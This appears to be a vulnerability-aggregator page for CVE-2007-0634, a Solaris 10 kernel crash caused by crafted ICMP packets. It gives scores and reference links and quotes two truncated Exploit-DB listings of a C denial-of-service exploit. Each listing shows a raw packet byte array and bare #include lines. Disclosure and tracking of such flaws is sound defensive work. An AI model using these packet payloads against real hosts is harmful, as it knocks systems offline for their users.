CVE-2007-0634
published 2007-01-31CVE-2007-0634: Unspecified vulnerability in Sun Solaris 10 before 20070130 allows remote attackers to cause a denial of service (system crash) via certain ICMP packets.
PriorityP335high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
9.07%
94.6th percentile
Unspecified vulnerability in Sun Solaris 10 before 20070130 allows remote attackers to cause a denial of service (system crash) via certain ICMP packets.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | solaris | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SunOS 5.10 - Remote ICMP Kernel Crash
exploitdb·2008-01-10
CVE-2007-0634 SunOS 5.10 - Remote ICMP Kernel Crash
SunOS 5.10 - Remote ICMP Kernel Crash
---
/*
SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope
Null Pointer Dereference in Kernel Space
Seems to work only if attacked in the same network segment,
maybe because of firewalls/routers in place.
This seems to be the issue described in bid 22323.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned char rawData[77] =
{
0x45, 0xFF, 0x00, 0x4D, 0x0C, 0x52, 0x00, 0x00, 0x7E, 0x01, 0x0C, 0xF2, 0xE0, 0x5A, 0x73, 0x12,
0xC0, 0xA8, 0x0E, 0x58, 0x08, 0xDE, 0xAE, 0x37, 0x6F, 0x3B, 0x66, 0xA7, 0x60, 0xAA, 0x76, 0xC1,
0xEC, 0xA7, 0x7D, 0xFA, 0x8A, 0x72, 0x8E, 0xC6, 0xE3, 0xD2, 0x64, 0x13, 0xE7, 0x4D, 0xBC, 0x01,
0x40, 0x5B, 0x8E, 0x8B, 0xE5, 0xEE, 0x5E, 0x37, 0xDD, 0xC2, 0x54, 0x8E, 0x8D, 0xCE, 0x0C,
Exploit-DB
Sun Solaris 10 - ICMP Remote Denial of Service
exploitdb·2007-01-30
CVE-2007-0634 Sun Solaris 10 - ICMP Remote Denial of Service
Sun Solaris 10 - ICMP Remote Denial of Service
---
// source: https://www.securityfocus.com/bid/22323/info
Sun Solaris is prone to a remote denial-of-service vulnerability.
A successful attack can trigger a crash in the operating system, leading to a denial-of-service condition for legitimate users.
Solaris 10 is affected by this issue.
/*
SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope
Null Pointer Dereference in Kernel Space
Seems to work only if attacked in the same network segment,
maybe because of firewalls/routers in place.
This seems to be the issue described in bid 22323.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned char rawData[77] =
{
0x45, 0xFF, 0x00, 0x4D, 0x0C, 0x52, 0x00, 0x00, 0x7E, 0x01, 0x0C, 0xF2, 0xE0
No writeups or analysis indexed.
http://osvdb.org/31878http://secunia.com/advisories/23982http://securitytracker.com/id?1017574http://sunsolve.sun.com/search/document.do?assetkey=1-26-102697-1http://www.kb.cert.org/vuls/id/967236http://www.securityfocus.com/bid/22323http://www.vupen.com/english/advisories/2007/0420https://exchange.xforce.ibmcloud.com/vulnerabilities/32010https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1249http://osvdb.org/31878http://secunia.com/advisories/23982http://securitytracker.com/id?1017574http://sunsolve.sun.com/search/document.do?assetkey=1-26-102697-1http://www.kb.cert.org/vuls/id/967236http://www.securityfocus.com/bid/22323http://www.vupen.com/english/advisories/2007/0420https://exchange.xforce.ibmcloud.com/vulnerabilities/32010https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1249
2007-01-31
Published